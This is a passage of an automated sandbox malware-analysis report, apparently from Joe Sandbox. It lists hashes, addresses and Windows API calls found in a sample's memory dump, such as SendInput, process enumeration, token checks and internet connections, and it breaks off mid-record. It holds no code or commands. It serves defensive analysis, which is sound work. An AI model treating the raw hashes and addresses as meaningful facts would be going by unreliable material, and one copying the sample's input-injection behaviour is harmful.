                                                          • Opcode ID: 130d80c35a4f91e36ddb57e1b0fe50b93ae6506758f6f961c93dc05baa9e9193
                                                          • Instruction ID: e78c66382b0b3c2333ee2c9d35a1151bc0027092ab72d0d17930606ec10534ec
                                                          • Opcode Fuzzy Hash: 130d80c35a4f91e36ddb57e1b0fe50b93ae6506758f6f961c93dc05baa9e9193
                                                          • Instruction Fuzzy Hash: 68413839600614DFCF12EF18C485A69BBE5AF8A310F098099ED4A9F362DB35FD01CB91
                                                          APIs
                                                          • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 004188DE
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: InvalidateRect
                                                          • String ID:
                                                          • API String ID: 634782764-0
                                                          • Opcode ID: 4e8b8e048d1187b2705a4e4c9fc75d535981940c3a3f6b744b79ee387b7dd084
                                                          • Instruction ID: 5f36717300cbb4adb945c7030bba80afd0dd79cf3eace82bbd4b477b4aa8ad4b
                                                          • Opcode Fuzzy Hash: 4e8b8e048d1187b2705a4e4c9fc75d535981940c3a3f6b744b79ee387b7dd084
                                                          • Instruction Fuzzy Hash: 2F31D474650108BFEF20AA58CC45BFA77A5EB06350F54411BF911E62A1CE38E9C19B5F
                                                          APIs
                                                          • ClientToScreen.USER32(?,?), ref: 0041AB60
                                                          • GetWindowRect.USER32(?,?), ref: 0041ABD6
                                                          • PtInRect.USER32(?,?,0041C014), ref: 0041ABE6
                                                          • MessageBeep.USER32(00000000), ref: 0041AC57
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: Rect$BeepClientMessageScreenWindow
                                                          • String ID:
                                                          • API String ID: 1352109105-0
                                                          • Opcode ID: b2dd7f6649854848ddcebecebb519b3638b432af49f27d39ba09c380627f9447
                                                          • Instruction ID: dbce62e261c9e36ba6b8b0d6888804ab745e758cb65bb55ae6a96a439b9ab60f
                                                          • Opcode Fuzzy Hash: b2dd7f6649854848ddcebecebb519b3638b432af49f27d39ba09c380627f9447
                                                          • Instruction Fuzzy Hash: 98418230601219DFCB11DF58D884BE977F6FB45315F18807AE5149B361E734E8A1CB9A
                                                          APIs
                                                          • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 003F0B27
                                                          • SetKeyboardState.USER32(00000080,?,00000001), ref: 003F0B43
                                                          • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 003F0BA9
                                                          • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 003F0BFB
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: KeyboardState$InputMessagePostSend
                                                          • String ID:
                                                          • API String ID: 432972143-0
                                                          • Opcode ID: 49e680f4858974ee3be8a121b3ca4eb1d949c04df542bfc0ca736d1cd8efb09d
                                                          • Instruction ID: 2b894523cc36fef9b15deba9dcef726b62fa1eee153a22a8049abed87aaf6745
                                                          • Opcode Fuzzy Hash: 49e680f4858974ee3be8a121b3ca4eb1d949c04df542bfc0ca736d1cd8efb09d
                                                          • Instruction Fuzzy Hash: 17315A70D4021CAEFF3A8B2D8C05BFABBAAAB45318F04836AE690561D3C3B5CD459755
                                                          APIs
                                                          • GetKeyboardState.USER32(?,7707C0D0,?,00008000), ref: 003F0C66
                                                          • SetKeyboardState.USER32(00000080,?,00008000), ref: 003F0C82
                                                          • PostMessageW.USER32(00000000,00000101,00000000), ref: 003F0CE1
                                                          • SendInput.USER32(00000001,?,0000001C,7707C0D0,?,00008000), ref: 003F0D33
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: KeyboardState$InputMessagePostSend
                                                          • String ID:
                                                          • API String ID: 432972143-0
                                                          • Opcode ID: 536645d0328806458549c3046239d09a558154f5ddb1fbbed65b79247b3d73a4
                                                          • Instruction ID: 0693f83e94c06f25406060fd130d0ce43ff284a712e0b2378eb892bfcd45bd8d
                                                          • Opcode Fuzzy Hash: 536645d0328806458549c3046239d09a558154f5ddb1fbbed65b79247b3d73a4
                                                          • Instruction Fuzzy Hash: 8231693094021CAEFF3A8B6D8C147FEBBAAAB45320F04832AF6945A1D3C3799D458751
                                                          APIs
                                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 003C61FB
                                                          • __isleadbyte_l.LIBCMT ref: 003C6229
                                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 003C6257
                                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 003C628D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                          • String ID:
                                                          • API String ID: 3058430110-0
                                                          • Opcode ID: 7d7fd72d4b3ccf17b91826b300b324f94155eb2fb283a0c2470154bb9fe739e1
                                                          • Instruction ID: 27733bb4b97d3138308237218b9a6bd20adc198bb940658f4dc9d19efc9ed6d4
                                                          • Opcode Fuzzy Hash: 7d7fd72d4b3ccf17b91826b300b324f94155eb2fb283a0c2470154bb9fe739e1
                                                          • Instruction Fuzzy Hash: BD31C130604246AFDF228F65CC4AFAA7BA9FF41310F16442DE864CB1A1D731DD50D790
                                                          APIs
                                                          • GetForegroundWindow.USER32 ref: 00414F02
                                                            • Part of subcall function 003F3641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 003F365B
                                                            • Part of subcall function 003F3641: GetCurrentThreadId.KERNEL32 ref: 003F3662
                                                            • Part of subcall function 003F3641: AttachThreadInput.USER32(00000000,?,003F5005), ref: 003F3669
                                                          • GetCaretPos.USER32(?), ref: 00414F13
                                                          • ClientToScreen.USER32(00000000,?), ref: 00414F4E
                                                          • GetForegroundWindow.USER32 ref: 00414F54
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                          • String ID:
                                                          • API String ID: 2759813231-0
                                                          • Opcode ID: 2a923ce8a2afb57d7d9fb7662b75d5564724f67985a64c3dd9dc4cc460b3d06a
                                                          • Instruction ID: fa087713875643d50b03f6500f515ba0dc023f1765da1bc8af1520bd67a4b60d
                                                          • Opcode Fuzzy Hash: 2a923ce8a2afb57d7d9fb7662b75d5564724f67985a64c3dd9dc4cc460b3d06a
                                                          • Instruction Fuzzy Hash: 2D313E71E00108AFCB01EFA9C885EEFB7FDEF99300F10406AE415E7241EA759E458BA1
                                                          APIs
                                                          • CreateToolhelp32Snapshot.KERNEL32 ref: 003F3C7A
                                                          • Process32FirstW.KERNEL32(00000000,?), ref: 003F3C88
                                                          • Process32NextW.KERNEL32(00000000,?), ref: 003F3CA8
                                                          • CloseHandle.KERNEL32(00000000), ref: 003F3D52
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                          • String ID:
                                                          • API String ID: 420147892-0
                                                          • Opcode ID: 4fdf3a8807b42d197406f49b46198c1e66783ded4ddebf1fca2bebc839b3ec78
                                                          • Instruction ID: e6ba6e379aeb8999e52a57b5bd221668d3b186616772bcc9bf4492fe01093d51
                                                          • Opcode Fuzzy Hash: 4fdf3a8807b42d197406f49b46198c1e66783ded4ddebf1fca2bebc839b3ec78
                                                          • Instruction Fuzzy Hash: C931A0311083099FD702EF60C881ABFBBE8EF95354F50082DF5818A1A1EB719A49CB92
                                                          APIs
                                                            • Part of subcall function 00392612: GetWindowLongW.USER32(?,000000EB), ref: 00392623
                                                          • GetCursorPos.USER32(?), ref: 0041C4D2
                                                          • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,003CB9AB,?,?,?,?,?), ref: 0041C4E7
                                                          • GetCursorPos.USER32(?), ref: 0041C534
                                                          • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,003CB9AB,?,?,?), ref: 0041C56E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                          • String ID:
                                                          • API String ID: 2864067406-0
                                                          • Opcode ID: 827c377fb969d15b3bf7d1f0b78a2334a9b59a581ab2d418d4f65fe15189e25f
                                                          • Instruction ID: c643ec678fca61fdabf78c9391e3a8d99267af7e3aa30e57c0907ffeed414a77
                                                          • Opcode Fuzzy Hash: 827c377fb969d15b3bf7d1f0b78a2334a9b59a581ab2d418d4f65fe15189e25f
                                                          • Instruction Fuzzy Hash: 4C318E35600428FFCB159F58DC98EEB7BB6EB09310F44406AF9058B362C735A991DBA8
                                                          APIs
                                                            • Part of subcall function 003E810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 003E8121
                                                            • Part of subcall function 003E810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 003E812B
                                                            • Part of subcall function 003E810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 003E813A
                                                            • Part of subcall function 003E810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 003E8141
                                                            • Part of subcall function 003E810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 003E8157
                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 003E86A3
                                                          • _memcmp.LIBCMT ref: 003E86C6
                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 003E86FC
                                                          • HeapFree.KERNEL32(00000000), ref: 003E8703
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                          • String ID:
                                                          • API String ID: 1592001646-0
                                                          • Opcode ID: f9b2b85b320c9ba41e6e435da744d715d2c90f1d3cdb518f57a5cdb3bc76d0f8
                                                          • Instruction ID: 9577bbc1ec1e6b8beb31ecc8454ab5c1193cfa2f7c62618b3743abd323de7a34
                                                          • Opcode Fuzzy Hash: f9b2b85b320c9ba41e6e435da744d715d2c90f1d3cdb518f57a5cdb3bc76d0f8
                                                          • Instruction Fuzzy Hash: A121B371E40158EFDB11DFA6C949BEEB7B8FF44308F158159E548AB280DB30AE05CB50
                                                          APIs
                                                          • __setmode.LIBCMT ref: 003B09AE
                                                            • Part of subcall function 00395A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,003F7896,?,?,00000000), ref: 00395A2C
                                                            • Part of subcall function 00395A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,003F7896,?,?,00000000,?,?), ref: 00395A50
                                                          • _fprintf.LIBCMT ref: 003B09E5
                                                          • OutputDebugStringW.KERNEL32(?), ref: 003E5DBB
                                                            • Part of subcall function 003B4AAA: _flsall.LIBCMT ref: 003B4AC3
                                                          • __setmode.LIBCMT ref: 003B0A1A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                          • String ID:
                                                          • API String ID: 521402451-0
                                                          • Opcode ID: 8ad472ba2318dabf8dfb52272ffbdee92f0c649cfab1f52d1814186654a765e8
                                                          • Instruction ID: 4e14ce897227a772d3d9a8c030b376fdd8697175f30821176b4ad2b50f7f39ca
                                                          • Opcode Fuzzy Hash: 8ad472ba2318dabf8dfb52272ffbdee92f0c649cfab1f52d1814186654a765e8
                                                          • Instruction Fuzzy Hash: B1112731A046086FDB0BB3B89C47AFE776C9F46324F20015AF3049A593EE21584687A9
                                                          APIs
                                                          • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 004017A3
                                                            • Part of subcall function 0040182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0040184C
                                                            • Part of subcall function 0040182D: InternetCloseHandle.WININET(00000000), ref: 004018E9
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: Internet$CloseConnectHandleOpen
                                                          • String ID:
                                                          • API String ID: 1463438336-0
                                                          • Opcode ID: 42b1015ef1cdaea258b5e1e0855236d44aa1b973caba26e1614e9adb7b46fb3c
                                                          • Instruction ID: 6009a6cf74544879c8bae27a1e974c2d83936ee304ced4820f6b80f8c94931c9
                                                          • Opcode Fuzzy Hash: 42b1015ef1cdaea258b5e1e0855236d44aa1b973caba26e1614e9adb7b46fb3c
                                                          • Instruction Fuzzy Hash: 1721C236200601BFEB129F608C00FBBBBA9FF48710F10803FF915A66E0D775991197A8
                                                          APIs
                                                          • GetFileAttributesW.KERNEL32(?,0041FAC0), ref: 003F3A64
                                                          • GetLastError.KERNEL32 ref: 003F3A73
                                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 003F3A82
                                                          • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0041FAC0), ref: 003F3ADF
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: CreateDirectory$AttributesErrorFileLast
                                                          • String ID:
                                                          • API String ID: 2267087916-0
                                                          • Opcode ID: 9c2c3bc6a26d16985a38191579667285f9dd14f8c0cd6532831ba83d2c7d3068
                                                          • Instruction ID: c5cfd637107dcbaa45118edf02f7b88443b374f3cbe757faf0445fabd535b9ca
                                                          • Opcode Fuzzy Hash: 9c2c3bc6a26d16985a38191579667285f9dd14f8c0cd6532831ba83d2c7d3068
                                                          • Instruction Fuzzy Hash: 2621A3745082059F8B01DF39C8818BAB7E8EE55364F104A2DF599C72E1E731DE4ACB42
                                                          APIs
                                                            • Part of subcall function 003EF0BC: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,003EDCD3,?,?,?,003EEAC6,00000000,000000EF,00000119,?,?), ref: 003EF0CB
                                                            • Part of subcall function 003EF0BC: lstrcpyW.KERNEL32(00000000,?,?,003EDCD3,?,?,?,003EEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 003EF0F1
                                                            • Part of subcall function 003EF0BC: lstrcmpiW.KERNEL32(00000000,?,003EDCD3,?,?,?,003EEAC6,00000000,000000EF,00000119,?,?), ref: 003EF122
                                                          • lstrlenW.KERNEL32(?,00000002,?,?,?,?,003EEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 003EDCEC
                                                          • lstrcpyW.KERNEL32(00000000,?,?,003EEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 003EDD12
                                                          • lstrcmpiW.KERNEL32(00000002,cdecl,?,003EEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 003EDD46
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: lstrcmpilstrcpylstrlen
                                                          • String ID: cdecl
                                                          • API String ID: 4031866154-3896280584
                                                          • Opcode ID: a890725019ae0c00e4b5c462ed2a22e3088eefca50971f4aa0fc1f3ec65a1d74
                                                          • Instruction ID: a6b0f544c00efbd31b84fb77afcf0bd0fce9c04a7abc7b65b62759998efc0515
                                                          • Opcode Fuzzy Hash: a890725019ae0c00e4b5c462ed2a22e3088eefca50971f4aa0fc1f3ec65a1d74
                                                          • Instruction Fuzzy Hash: B411BE3A200355EFCB26AF35CC459BB77A8FF45350B40822AE906CB2A0EB719C51C794
                                                          APIs
                                                          • _free.LIBCMT ref: 003C5101
                                                            • Part of subcall function 003B571C: __FF_MSGBANNER.LIBCMT ref: 003B5733
                                                            • Part of subcall function 003B571C: __NMSG_WRITE.LIBCMT ref: 003B573A
                                                            • Part of subcall function 003B571C: RtlAllocateHeap.NTDLL(012D0000,00000000,00000001,00000000,?,?,?,003B0DD3,?), ref: 003B575F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: AllocateHeap_free
                                                          • String ID:
                                                          • API String ID: 614378929-0
                                                          • Opcode ID: bde2fced03f4ba293a22987dbe9457a18162a1b18cb9985181153c524f64b2b3
                                                          • Instruction ID: 215137e829aea450fdf2cddaaa7cd505abb01e4e6fea57744368c8e9fa9b1cbc
                                                          • Opcode Fuzzy Hash: bde2fced03f4ba293a22987dbe9457a18162a1b18cb9985181153c524f64b2b3
                                                          • Instruction Fuzzy Hash: F411A0B2900A15AECF237FB4AC49F9E3B9C9B043A5B15453DFA08DE651DE30DD818794
                                                          APIs
                                                            • Part of subcall function 00395A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,003F7896,?,?,00000000), ref: 00395A2C
                                                            • Part of subcall function 00395A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,003F7896,?,?,00000000,?,?), ref: 00395A50
                                                          • gethostbyname.WSOCK32(?,?,?), ref: 00406399
                                                          • WSAGetLastError.WSOCK32(00000000), ref: 004063A4
                                                          • _memmove.LIBCMT ref: 004063D1
                                                          • inet_ntoa.WSOCK32(?), ref: 004063DC
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                          • String ID:
                                                          • API String ID: 1504782959-0
                                                          • Opcode ID: af325507470f4796899fc199830439cc461b5815b39f1ebb61efc7822450aa44
                                                          • Instruction ID: 8a729480205e662eca00da7721ea3b04b383696b43a1935203305d6c403e49c6
                                                          • Opcode Fuzzy Hash: af325507470f4796899fc199830439cc461b5815b39f1ebb61efc7822450aa44
                                                          • Instruction Fuzzy Hash: 8D115132500109AFCF06FBA4DD46DEE77B8AF08314B14407AF506BB1A1DB30AE15CB65
                                                          APIs
                                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 003E8B61
                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 003E8B73
                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 003E8B89
                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 003E8BA4
                                                          Memory Dump Source
